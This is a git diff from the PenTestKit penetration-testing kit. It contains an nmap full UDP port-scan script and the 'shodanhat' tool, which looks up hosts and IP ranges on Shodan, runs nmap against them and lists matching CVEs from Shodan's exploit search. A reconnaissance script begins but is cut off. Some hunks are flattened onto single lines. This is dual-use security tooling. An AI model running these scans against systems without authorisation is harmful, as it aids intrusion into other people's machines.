+#!/bin/bash
+
+# This file is part of PenTestKit
+# Copyright (C) 2017-2018 @maldevel
+# https://github.com/maldevel/PenTestKit
+#
+# PenTestKit - Useful tools for Penetration Testing.
+#
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program. If not, see .
+#
+# For more see the file 'LICENSE' for copying permission.
+
+
+if [[ $EUID -ne 0 ]]; then
+ echo "Please run this script as root." 1>&2
+ exit 1
+fi
+
+if [ $# -eq 1 ]; then
+ nmap -sU -vv -p- -Pn --reason --open -oA udp_ports_full_$1 $1
+else
+ echo "Please provide the target IP address or an IP range."
+fi
diff --git a/port-scanning/udp/full/udp-ports-scan-full.sh b/port-scanning/udp/full/udp-ports-scan-full.sh
index f1eeaf7..aaffce5 100755
--- a/port-scanning/udp/full/udp-ports-scan-full.sh
+++ b/port-scanning/udp/full/udp-ports-scan-full.sh
@@ -1,34 +1,34 @@
-#!/bin/bash
-
-# This file is part of PenTestKit
-# Copyright (C) 2017-2018 @maldevel
-# https://github.com/maldevel/PenTestKit
-#
-# PenTestKit - Useful tools for Penetration Testing.
-#
-# This program is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program. If not, see .
-#
-# For more see the file 'LICENSE' for copying permission.
-
-
-if [[ $EUID -ne 0 ]]; then
- echo "Please run this script as root." 1>&2
- exit 1
-fi
-
-if [ $# -eq 1 ]; then
- nmap -sU -vv -p- --reason --open -oA udp_ports_full_$1 $1
-else
- echo "Please provide the target IP address or an IP range."
-fi
+#!/bin/bash
+
+# This file is part of PenTestKit
+# Copyright (C) 2017-2018 @maldevel
+# https://github.com/maldevel/PenTestKit
+#
+# PenTestKit - Useful tools for Penetration Testing.
+#
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program. If not, see .
+#
+# For more see the file 'LICENSE' for copying permission.
+
+
+if [[ $EUID -ne 0 ]]; then
+ echo "Please run this script as root." 1>&2
+ exit 1
+fi
+
+if [ $# -eq 1 ]; then
+ nmap -sU -vv -p- --reason --open -oA udp_ports_full_$1 $1
+else
+ echo "Please provide the target IP address or an IP range."
+fi
diff --git a/reconnaissance/shodan/shodanhat/LICENSE b/reconnaissance/shodan/shodanhat/LICENSE
index 20ab041..036ba9e 100644
--- a/reconnaissance/shodan/shodanhat/LICENSE
+++ b/reconnaissance/shodan/shodanhat/LICENSE
@@ -1,21 +1,21 @@ -MIT License - -Copyright (c) 2017 HatBashBR - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. +MIT License + +Copyright (c) 2017 HatBashBR + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/reconnaissance/shodan/shodanhat/README.md b/reconnaissance/shodan/shodanhat/README.md index 59aa62d..8db211f 100644 --- a/reconnaissance/shodan/shodanhat/README.md +++ b/reconnaissance/shodan/shodanhat/README.md @@ -1,30 +1,30 @@ -# Dependencies -You need to install shodan with pip install shodan or easy_install shodan.
-You need to install python-nmap with pip install python-nmap.
-You need to set your API Key in the 'constantes.py' file. - -# Options --h, --help show this help message and exit
--i IP, --ip=IP info about one host
--l LIST, --list=LIST info about a list of hosts
--s SQ, --sq=SQ searchquery string
---nmap perform a nmap scan in the hosts
---setkey=SETKEY set your api key automatically
--r RANGE, --range=RANGE scan a range of ips. ex: 192.168.1.1-192.168.1.255
--o OUTPUT, --output=OUTPUT specify a output file

- -Nmap Options:
---sS TCP Syn Scan
---sT TCP Connect Scan
---sU UDP Scan - -# Usage -For One Host
-python shodanhat.py -i IP
-For a list of Hosts
-python shodanhat.py -l list.txt
-You can also set a searchquery to make a specific query with '-s' option! - -# ScreenShots -
+# Dependencies +You need to install shodan with pip install shodan or easy_install shodan.
+You need to install python-nmap with pip install python-nmap.
+You need to set your API Key in the 'constantes.py' file. + +# Options +-h, --help show this help message and exit
+-i IP, --ip=IP info about one host
+-l LIST, --list=LIST info about a list of hosts
+-s SQ, --sq=SQ searchquery string
+--nmap perform a nmap scan in the hosts
+--setkey=SETKEY set your api key automatically
+-r RANGE, --range=RANGE scan a range of ips. ex: 192.168.1.1-192.168.1.255
+-o OUTPUT, --output=OUTPUT specify a output file

+ +Nmap Options:
+--sS TCP Syn Scan
+--sT TCP Connect Scan
+--sU UDP Scan + +# Usage +For One Host
+python shodanhat.py -i IP
+For a list of Hosts
+python shodanhat.py -l list.txt
+You can also set a searchquery to make a specific query with '-s' option! + +# ScreenShots +
\ No newline at end of file
diff --git a/reconnaissance/shodan/shodanhat/shodanhat.py b/reconnaissance/shodan/shodanhat/shodanhat.py
index 29cdd0b..8de73a2 100644
--- a/reconnaissance/shodan/shodanhat/shodanhat.py
+++ b/reconnaissance/shodan/shodanhat/shodanhat.py
@@ -1,319 +1,319 @@ -#!/usr/bin/env python -# -*- coding: utf-8 -*- - -import optparse, shodan, sys, nmap, urllib2, json, os -from constantes import * - -class colors: - GREEN = '\033[92m' - YELLOW = '\033[93m' - FAIL = '\033[91m' - END = '\033[0m' - -def banner(): - print colors.GREEN + "███████╗██╗ ██╗ ██████╗ ██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ████████╗" - print "██╔════╝██║ ██║██╔═══██╗██╔══██╗██╔══██╗████╗ ██║██║ ██║██╔══██╗╚══██╔══╝" - print "███████╗███████║██║ ██║██║ ██║███████║██╔██╗ ██║███████║███████║ ██║ " - print "╚════██║██╔══██║██║ ██║██║ ██║██╔══██║██║╚██╗██║██╔══██║██╔══██║ ██║ " - print "███████║██║ ██║╚██████╔╝██████╔╝██║ ██║██║ ╚████║██║ ██║██║ ██║ ██║ " - print "╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ " - print "" - print "Author: Everton a.k.a XGU4RD14N && Mateus a.k.a Dctor" - print "Members HatBashBR: Johnny a.k.a UrdSys, Evelyn a.k.a Alyosha, Geovane" - print "fb.com/hatbashbr" - print "github.com/hatbashbr" + colors.END - print colors.YELLOW + "[!] Legal Disclaimer: We aren't responsible for bad use of this tool!" 
+ colors.END - print "" -banner() - -hosts = {} - -def ipRange(start_ip, end_ip): - start = list(map(int, start_ip.split("."))) - end = list(map(int, end_ip.split("."))) - temp = start - ip_range = [] - - ip_range.append(start_ip) - while temp != end: - start[3] += 1 - for i in (3, 2, 1): - if temp[i] == 256: - temp[i] = 0 - temp[i-1] += 1 - ip_range.append(".".join(map(str, temp))) - - return ip_range - -def saveExploits(ip, port, o): - if hosts[ip][port][0] == "" or hosts[ip][port][1] == "": - o.write(" [-] No exploits could be found\n") - else: - query = "%s %s"%(hosts[ip][port][0], hosts[ip][port][1]) - query = query.replace(" ", "+") - url = urllib2.urlopen("https://exploits.shodan.io/api/search?query=%s&key=%s"%(query, SHODAN_API_KEY)) - xpls = json.load(url) - if xpls["total"] > 0: - o.write(" Possible Exploits:\n") - for i in xpls["matches"]: - if i.has_key("cve"): - for cve in i["cve"]: - o.write(" [+] CVE: %s\n"%cve) - elif i.has_key("_id"): - o.write(" [+] ID: %s\n"%i["_id"]) - else: - o.write(" [-] No exploits could be found\n") - -def searchExploits(ip, port): - if hosts[ip][port][0] == "" or hosts[ip][port][1] == "": - print colors.FAIL + " [-] No exploits could be found" + colors.END - else: - query = "%s %s"%(hosts[ip][port][0], hosts[ip][port][1]) - query = query.replace(" ", "+") - url = urllib2.urlopen("https://exploits.shodan.io/api/search?query=%s&key=%s"%(query, SHODAN_API_KEY)) - xpls = json.load(url) - if xpls["total"] > 0: - print colors.GREEN +" Possible Exploits:" - for i in xpls["matches"]: - if i.has_key("cve"): - for cve in i["cve"]: - print " [+] CVE: %s"%cve - elif i.has_key("_id"): - print " [+] ID: %s"%i["_id"] - print colors.END, - else: - print colors.FAIL + " [-] No exploits could be found" + colors.END - -def saveInfo(host, o): - o.write("IP: %s\n"%host["ip_str"]) - o.write("Organization: %s\n"%host.get("org", "n/a")) - o.write("Operating System: %s\n"%host.get("os", "n/a")) - o.write("Latitude: %s\n"%host["latitude"]) - 
o.write("Longitude: %s\n"%host["longitude"]) - o.write("City: %s\n"%host["city"]) - o.write("Hostnames:\n") - if len(host["hostnames"]) == 0: - o.write(" [-] No hostnames\n") - else: - for i in host["hostnames"]: - o.write(" [+] %s\n"%str(i)) - if host.has_key('vulns'): - o.write("Vulnerabilities:\n") - for i in host["vulns"]: - o.write(" [+] %s\n"%str(i)) - - if options.nmap: - hosts[str(host["ip_str"])] = {} - ports = "" - for item in host["data"]: - if item == host["data"][-1]: - ports += str(item["port"]) - else: - ports += str(item["port"])+"," - args = options.scantype - nm.scan(str(host["ip_str"]), ports, arguments=args) - if str(host["ip_str"]) in nm.all_hosts(): - o.write("Ports:\n") - for port in nm[str(host["ip_str"])]["tcp"]: - hosts[host["ip_str"]][port] = [nm[host["ip_str"]]["tcp"][port]["product"],nm[host["ip_str"]]["tcp"][port]["version"]] - o.write(" [+] %s\t%s %s %s\n"%(port, nm[host["ip_str"]]["tcp"][port]["product"], nm[host["ip_str"]]["tcp"][port]["version"], nm[host["ip_str"]]["tcp"][port]["extrainfo"])) - saveExploits(host["ip_str"], port, o) - else: - o.write("Ports:\n") - for item in host["data"]: - print o.write(" [+] %s\n"%item["port"]) - else: - o.write("Ports:\n") - for item in host["data"]: - o.write(" [+] %s\n"%item["port"]) - -def printInfo(host): - print colors.GREEN + "IP: %s"%host["ip_str"] - print "Organization: %s"%host.get("org", "n/a") - print "Operating System: %s"%host.get("os", "n/a") - print "Latitude: %s"%host["latitude"] - print "Longitude: %s"%host["longitude"] - print "City: %s"%host["city"] - print "Hostnames:" - if len(host["hostnames"]) == 0: - print colors.FAIL + " [-] No hostnames" + colors.END + colors.GREEN - else: - for i in host["hostnames"]: - print " [+] " + i - if host.has_key('vulns'): - print "Vulnerabilities:" - for i in host["vulns"]: - print " [+] " +i - - if options.nmap: - hosts[str(host["ip_str"])] = {} - ports = "" - for item in host["data"]: - if item == host["data"][-1]: - ports += 
str(item["port"]) - else: - ports += str(item["port"])+"," - - args = options.scantype - nm.scan(str(host["ip_str"]), ports, arguments=args) - if str(host["ip_str"]) in nm.all_hosts(): - print "Ports: " - for port in nm[str(host["ip_str"])]["tcp"]: - hosts[host["ip_str"]][port] = [nm[host["ip_str"]]["tcp"][port]["product"],nm[host["ip_str"]]["tcp"][port]["version"]] - print colors.GREEN + " [+] %s\t%s %s %s"%(port, nm[host["ip_str"]]["tcp"][port]["product"], nm[host["ip_str"]]["tcp"][port]["version"], nm[host["ip_str"]]["tcp"][port]["extrainfo"]) + colors.END - searchExploits(host["ip_str"], port) - else: - print "Ports: " - for item in host["data"]: - print colors.GREEN + " [+] %s"%item["port"] + colors.END - else: - print "Ports: " - for item in host["data"]: - print colors.GREEN + " [+] %s"%item["port"] + colors.END - print colors.END, - - - -parser = optparse.OptionParser() -parser.add_option("-i", "--ip", dest="ip", help="info about one host", default="") -parser.add_option("-l", "--list", dest="list", help="info about a list of hosts", default="") -parser.add_option("-s", "--sq", dest="sq", help="searchquery string", default="") -parser.add_option("--nmap", dest="nmap", action="store_true", help="perform a nmap scan in the hosts") -parser.add_option("--setkey", dest="setkey", help="set your api key automatically", default="") -parser.add_option("-r", "--range", dest="range", help="scan a range of ips. 
ex: 192.168.1.1-192.168.1.255", default="") -parser.add_option("-o", "--output", dest="output", help="specify a output file", default="") -group = optparse.OptionGroup(parser, "Nmap Options") -group.add_option("--sS", dest="scantype", action="store_const", help="TCP Syn Scan", const="-sS") -group.add_option("--sT", dest="scantype", action="store_const", help="TCP Connect Scan", const="-sT") -group.add_option("--sU", dest="scantype", action="store_const", help="UDP Scan", const="-sU") -parser.add_option_group(group) -parser.set_defaults(scantype="-sT") -options, args = parser.parse_args() - -if options.setkey != "": - f = open("constantes.py", 'w') - f.write('SHODAN_API_KEY = "%s"'%options.setkey) - SHODAN_API_KEY = options.setkey - -if SHODAN_API_KEY == "": - print "You need to set the API Key in the file 'constantes.py' or with the '--setkey' option" - sys.exit() - -if options.ip != "" and options.list != "": - print "You can't use '-i' with '-l'!" - sys.exit() - -api = shodan.Shodan(SHODAN_API_KEY) -nm = nmap.PortScanner() - -if options.output != "": - if os.path.isfile(options.output): - try: - ans = str(raw_input(colors.FAIL + "[-] File already exists, if you continue it will erase all the content of the file. continue? (y/N): " + colors.END)) - if ans != "y" and ans != "Y": - print colors.GREEN + "[+] Exiting..." + colors.END - sys.exit() - except SyntaxError: - print colors.GREEN + "[+] Exiting..." 
+ colors.END - sys.exit() - o = open(options.output, 'w') - -if options.ip != "": - if options.output != "": - try: - print colors.GREEN + "[+] Writing host's info to the file" + colors.END - host = api.host(options.ip) - saveInfo(host, o) - except Exception as e: - o.write("[-] "+ str(ip) +"\n Error: "+str(e)+"\n\n") - else: - try: - host = api.host(options.ip) - printInfo(host) - except Exception as e: - print colors.FAIL + "[-] "+ str(options.ip) +"\n Error: "+str(e) + colors.END - print -elif options.list != "": - f = open(options.list) - if options.output != "": - print colors.GREEN + "[+] Writing hosts' info to the file" + colors.END - for ip in f.readlines(): - try: - host = api.host(ip) - saveInfo(host, o) - o.write('\n') - except Exception as e: - o.write("[-] "+ str(ip) +"\n Error: "+str(e)+"\n\n") - else: - for ip in f.readlines(): - try: - host = api.host(ip) - printInfo(host) - print - except Exception as e: - print colors.FAIL + "[-] "+ str(options.ip) +"\n Error: "+str(e) + colors.END - print -elif options.range != "": - first = options.range.split('-')[0] - second = options.range.split('-')[1] - - #Verify if is a valid range - if len(first.split('.')) != 4 or len(second.split('.')) != 4: - print "[-] Invalid range! see the help to use the --range option." - sys.exit() - - #Verify if is a valid IP - for i in first.split('.'): - if int(i) > 255: - print "[-] Invalid IP! see the help to use the --range option." - sys.exit() - - for i in second.split('.'): - if int(i) > 255: - print "[-] Invalid IP! see the help to use the --range option." - sys.exit() - - firstSplited = first.split('.') - secondSplited = second.split('.') - firstSum = int(firstSplited[0])+int(firstSplited[1])+int(firstSplited[2])+int(firstSplited[3]) - secondSum = int(secondSplited[0])+int(secondSplited[1])+int(secondSplited[2])+int(secondSplited[3]) - - if(firstSum >= secondSum): - print "[-] Invalid range! see the help to use the --range option." 
- sys.exit() - - iprange = ipRange(first, second) - - if options.output != "": - print colors.GREEN + "[+] Writing hosts' info to the file" + colors.END - for ip in iprange: - try: - host = api.host(ip) - saveInfo(host, o) - o.write('\n') - except Exception as e: - o.write("[-] "+ str(ip) +"\n Error: "+str(e)+"\n\n") - else: - for ip in iprange: - try: - host = api.host(ip) - printInfo(host) - print - except Exception as e: - print colors.FAIL + "[-] "+ str(ip) +"\n Error: "+str(e) + colors.END - print -if options.sq != "": - try: - result = api.search(options.sq) - if options.output != "": - print colors.GREEN + "[+] Writing query results to the file" + colors.END - o.write("##### IP's that match the query '%s' #####\n"%options.sq) - else: - print "##### IP's that match the query '%s' #####"%options.sq - for service in result['matches']: - if options.output != "": - o.write(service['ip_str']+"\n") - else: - print service['ip_str'] - except Exception as e: - print "Error: "+str(e) +#!/usr/bin/env python +# -*- coding: utf-8 -*- + +import optparse, shodan, sys, nmap, urllib2, json, os +from constantes import * + +class colors: + GREEN = '\033[92m' + YELLOW = '\033[93m' + FAIL = '\033[91m' + END = '\033[0m' + +def banner(): + print colors.GREEN + "███████╗██╗ ██╗ ██████╗ ██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ████████╗" + print "██╔════╝██║ ██║██╔═══██╗██╔══██╗██╔══██╗████╗ ██║██║ ██║██╔══██╗╚══██╔══╝" + print "███████╗███████║██║ ██║██║ ██║███████║██╔██╗ ██║███████║███████║ ██║ " + print "╚════██║██╔══██║██║ ██║██║ ██║██╔══██║██║╚██╗██║██╔══██║██╔══██║ ██║ " + print "███████║██║ ██║╚██████╔╝██████╔╝██║ ██║██║ ╚████║██║ ██║██║ ██║ ██║ " + print "╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ " + print "" + print "Author: Everton a.k.a XGU4RD14N && Mateus a.k.a Dctor" + print "Members HatBashBR: Johnny a.k.a UrdSys, Evelyn a.k.a Alyosha, Geovane" + print "fb.com/hatbashbr" + print "github.com/hatbashbr" + colors.END + print colors.YELLOW + "[!] 
Legal Disclaimer: We aren't responsible for bad use of this tool!" + colors.END + print "" +banner() + +hosts = {} + +def ipRange(start_ip, end_ip): + start = list(map(int, start_ip.split("."))) + end = list(map(int, end_ip.split("."))) + temp = start + ip_range = [] + + ip_range.append(start_ip) + while temp != end: + start[3] += 1 + for i in (3, 2, 1): + if temp[i] == 256: + temp[i] = 0 + temp[i-1] += 1 + ip_range.append(".".join(map(str, temp))) + + return ip_range + +def saveExploits(ip, port, o): + if hosts[ip][port][0] == "" or hosts[ip][port][1] == "": + o.write(" [-] No exploits could be found\n") + else: + query = "%s %s"%(hosts[ip][port][0], hosts[ip][port][1]) + query = query.replace(" ", "+") + url = urllib2.urlopen("https://exploits.shodan.io/api/search?query=%s&key=%s"%(query, SHODAN_API_KEY)) + xpls = json.load(url) + if xpls["total"] > 0: + o.write(" Possible Exploits:\n") + for i in xpls["matches"]: + if i.has_key("cve"): + for cve in i["cve"]: + o.write(" [+] CVE: %s\n"%cve) + elif i.has_key("_id"): + o.write(" [+] ID: %s\n"%i["_id"]) + else: + o.write(" [-] No exploits could be found\n") + +def searchExploits(ip, port): + if hosts[ip][port][0] == "" or hosts[ip][port][1] == "": + print colors.FAIL + " [-] No exploits could be found" + colors.END + else: + query = "%s %s"%(hosts[ip][port][0], hosts[ip][port][1]) + query = query.replace(" ", "+") + url = urllib2.urlopen("https://exploits.shodan.io/api/search?query=%s&key=%s"%(query, SHODAN_API_KEY)) + xpls = json.load(url) + if xpls["total"] > 0: + print colors.GREEN +" Possible Exploits:" + for i in xpls["matches"]: + if i.has_key("cve"): + for cve in i["cve"]: + print " [+] CVE: %s"%cve + elif i.has_key("_id"): + print " [+] ID: %s"%i["_id"] + print colors.END, + else: + print colors.FAIL + " [-] No exploits could be found" + colors.END + +def saveInfo(host, o): + o.write("IP: %s\n"%host["ip_str"]) + o.write("Organization: %s\n"%host.get("org", "n/a")) + o.write("Operating System: 
%s\n"%host.get("os", "n/a")) + o.write("Latitude: %s\n"%host["latitude"]) + o.write("Longitude: %s\n"%host["longitude"]) + o.write("City: %s\n"%host["city"]) + o.write("Hostnames:\n") + if len(host["hostnames"]) == 0: + o.write(" [-] No hostnames\n") + else: + for i in host["hostnames"]: + o.write(" [+] %s\n"%str(i)) + if host.has_key('vulns'): + o.write("Vulnerabilities:\n") + for i in host["vulns"]: + o.write(" [+] %s\n"%str(i)) + + if options.nmap: + hosts[str(host["ip_str"])] = {} + ports = "" + for item in host["data"]: + if item == host["data"][-1]: + ports += str(item["port"]) + else: + ports += str(item["port"])+"," + args = options.scantype + nm.scan(str(host["ip_str"]), ports, arguments=args) + if str(host["ip_str"]) in nm.all_hosts(): + o.write("Ports:\n") + for port in nm[str(host["ip_str"])]["tcp"]: + hosts[host["ip_str"]][port] = [nm[host["ip_str"]]["tcp"][port]["product"],nm[host["ip_str"]]["tcp"][port]["version"]] + o.write(" [+] %s\t%s %s %s\n"%(port, nm[host["ip_str"]]["tcp"][port]["product"], nm[host["ip_str"]]["tcp"][port]["version"], nm[host["ip_str"]]["tcp"][port]["extrainfo"])) + saveExploits(host["ip_str"], port, o) + else: + o.write("Ports:\n") + for item in host["data"]: + print o.write(" [+] %s\n"%item["port"]) + else: + o.write("Ports:\n") + for item in host["data"]: + o.write(" [+] %s\n"%item["port"]) + +def printInfo(host): + print colors.GREEN + "IP: %s"%host["ip_str"] + print "Organization: %s"%host.get("org", "n/a") + print "Operating System: %s"%host.get("os", "n/a") + print "Latitude: %s"%host["latitude"] + print "Longitude: %s"%host["longitude"] + print "City: %s"%host["city"] + print "Hostnames:" + if len(host["hostnames"]) == 0: + print colors.FAIL + " [-] No hostnames" + colors.END + colors.GREEN + else: + for i in host["hostnames"]: + print " [+] " + i + if host.has_key('vulns'): + print "Vulnerabilities:" + for i in host["vulns"]: + print " [+] " +i + + if options.nmap: + hosts[str(host["ip_str"])] = {} + ports = "" + for 
item in host["data"]: + if item == host["data"][-1]: + ports += str(item["port"]) + else: + ports += str(item["port"])+"," + + args = options.scantype + nm.scan(str(host["ip_str"]), ports, arguments=args) + if str(host["ip_str"]) in nm.all_hosts(): + print "Ports: " + for port in nm[str(host["ip_str"])]["tcp"]: + hosts[host["ip_str"]][port] = [nm[host["ip_str"]]["tcp"][port]["product"],nm[host["ip_str"]]["tcp"][port]["version"]] + print colors.GREEN + " [+] %s\t%s %s %s"%(port, nm[host["ip_str"]]["tcp"][port]["product"], nm[host["ip_str"]]["tcp"][port]["version"], nm[host["ip_str"]]["tcp"][port]["extrainfo"]) + colors.END + searchExploits(host["ip_str"], port) + else: + print "Ports: " + for item in host["data"]: + print colors.GREEN + " [+] %s"%item["port"] + colors.END + else: + print "Ports: " + for item in host["data"]: + print colors.GREEN + " [+] %s"%item["port"] + colors.END + print colors.END, + + + +parser = optparse.OptionParser() +parser.add_option("-i", "--ip", dest="ip", help="info about one host", default="") +parser.add_option("-l", "--list", dest="list", help="info about a list of hosts", default="") +parser.add_option("-s", "--sq", dest="sq", help="searchquery string", default="") +parser.add_option("--nmap", dest="nmap", action="store_true", help="perform a nmap scan in the hosts") +parser.add_option("--setkey", dest="setkey", help="set your api key automatically", default="") +parser.add_option("-r", "--range", dest="range", help="scan a range of ips. 
ex: 192.168.1.1-192.168.1.255", default="") +parser.add_option("-o", "--output", dest="output", help="specify a output file", default="") +group = optparse.OptionGroup(parser, "Nmap Options") +group.add_option("--sS", dest="scantype", action="store_const", help="TCP Syn Scan", const="-sS") +group.add_option("--sT", dest="scantype", action="store_const", help="TCP Connect Scan", const="-sT") +group.add_option("--sU", dest="scantype", action="store_const", help="UDP Scan", const="-sU") +parser.add_option_group(group) +parser.set_defaults(scantype="-sT") +options, args = parser.parse_args() + +if options.setkey != "": + f = open("constantes.py", 'w') + f.write('SHODAN_API_KEY = "%s"'%options.setkey) + SHODAN_API_KEY = options.setkey + +if SHODAN_API_KEY == "": + print "You need to set the API Key in the file 'constantes.py' or with the '--setkey' option" + sys.exit() + +if options.ip != "" and options.list != "": + print "You can't use '-i' with '-l'!" + sys.exit() + +api = shodan.Shodan(SHODAN_API_KEY) +nm = nmap.PortScanner() + +if options.output != "": + if os.path.isfile(options.output): + try: + ans = str(raw_input(colors.FAIL + "[-] File already exists, if you continue it will erase all the content of the file. continue? (y/N): " + colors.END)) + if ans != "y" and ans != "Y": + print colors.GREEN + "[+] Exiting..." + colors.END + sys.exit() + except SyntaxError: + print colors.GREEN + "[+] Exiting..." 
+ colors.END + sys.exit() + o = open(options.output, 'w') + +if options.ip != "": + if options.output != "": + try: + print colors.GREEN + "[+] Writing host's info to the file" + colors.END + host = api.host(options.ip) + saveInfo(host, o) + except Exception as e: + o.write("[-] "+ str(ip) +"\n Error: "+str(e)+"\n\n") + else: + try: + host = api.host(options.ip) + printInfo(host) + except Exception as e: + print colors.FAIL + "[-] "+ str(options.ip) +"\n Error: "+str(e) + colors.END + print +elif options.list != "": + f = open(options.list) + if options.output != "": + print colors.GREEN + "[+] Writing hosts' info to the file" + colors.END + for ip in f.readlines(): + try: + host = api.host(ip) + saveInfo(host, o) + o.write('\n') + except Exception as e: + o.write("[-] "+ str(ip) +"\n Error: "+str(e)+"\n\n") + else: + for ip in f.readlines(): + try: + host = api.host(ip) + printInfo(host) + print + except Exception as e: + print colors.FAIL + "[-] "+ str(options.ip) +"\n Error: "+str(e) + colors.END + print +elif options.range != "": + first = options.range.split('-')[0] + second = options.range.split('-')[1] + + #Verify if is a valid range + if len(first.split('.')) != 4 or len(second.split('.')) != 4: + print "[-] Invalid range! see the help to use the --range option." + sys.exit() + + #Verify if is a valid IP + for i in first.split('.'): + if int(i) > 255: + print "[-] Invalid IP! see the help to use the --range option." + sys.exit() + + for i in second.split('.'): + if int(i) > 255: + print "[-] Invalid IP! see the help to use the --range option." + sys.exit() + + firstSplited = first.split('.') + secondSplited = second.split('.') + firstSum = int(firstSplited[0])+int(firstSplited[1])+int(firstSplited[2])+int(firstSplited[3]) + secondSum = int(secondSplited[0])+int(secondSplited[1])+int(secondSplited[2])+int(secondSplited[3]) + + if(firstSum >= secondSum): + print "[-] Invalid range! see the help to use the --range option." 
+ sys.exit() + + iprange = ipRange(first, second) + + if options.output != "": + print colors.GREEN + "[+] Writing hosts' info to the file" + colors.END + for ip in iprange: + try: + host = api.host(ip) + saveInfo(host, o) + o.write('\n') + except Exception as e: + o.write("[-] "+ str(ip) +"\n Error: "+str(e)+"\n\n") + else: + for ip in iprange: + try: + host = api.host(ip) + printInfo(host) + print + except Exception as e: + print colors.FAIL + "[-] "+ str(ip) +"\n Error: "+str(e) + colors.END + print +if options.sq != "": + try: + result = api.search(options.sq) + if options.output != "": + print colors.GREEN + "[+] Writing query results to the file" + colors.END + o.write("##### IP's that match the query '%s' #####\n"%options.sq) + else: + print "##### IP's that match the query '%s' #####"%options.sq + for service in result['matches']: + if options.output != "": + o.write(service['ip_str']+"\n") + else: + print service['ip_str'] + except Exception as e: + print "Error: "+str(e) diff --git a/reconnaissance/web-reconnaissance.py b/reconnaissance/web-reconnaissance.py index 251f24a..bec5af3 100644 --- a/reconnaissance/web-reconnaissance.py +++ b/reconnaissance/web-reconnaissance.py 
@@ -1,403 +1,403 @@ -#!/usr/bin/python -# encoding: UTF-8 - -""" - This file is part of PenTestKit - Copyright (C) 2017-2018 @maldevel - https://github.com/maldevel/PenTestKit - - PenTestKit - Useful tools for Penetration Testing. - - This program is free software: you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation, either version 3 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program. If not, see . - - For more see the file 'LICENSE' for copying permission. - -""" - -__author__ = "maldevel" -__copyright__ = "Copyright (c) 2017-2018 @maldevel" -__credits__ = ["maldevel"] -__license__ = "GPLv3" -__version__ = "0.2" -__maintainer__ = "maldevel" - -################################ - -import argparse -import sys -import os -import requests -import socket -import ssl - -from bs4 import BeautifulSoup, Comment -from termcolor import colored -from argparse import RawTextHelpFormatter -from urlparse import urlparse - -################################ - -from requests.packages.urllib3.exceptions import InsecureRequestWarning #remove insecure https warning -requests.packages.urllib3.disable_warnings(InsecureRequestWarning) #remove insecure https warning - -################################ - -def yellow(text): - return colored(text, 'yellow', attrs=['bold']) - -def green(text): - return colored(text, 'green', attrs=['bold']) - -def red(text): - return colored(text, 'red', attrs=['bold']) - -def cyan(text): - return colored(text, 'cyan', attrs=['bold']) - -def 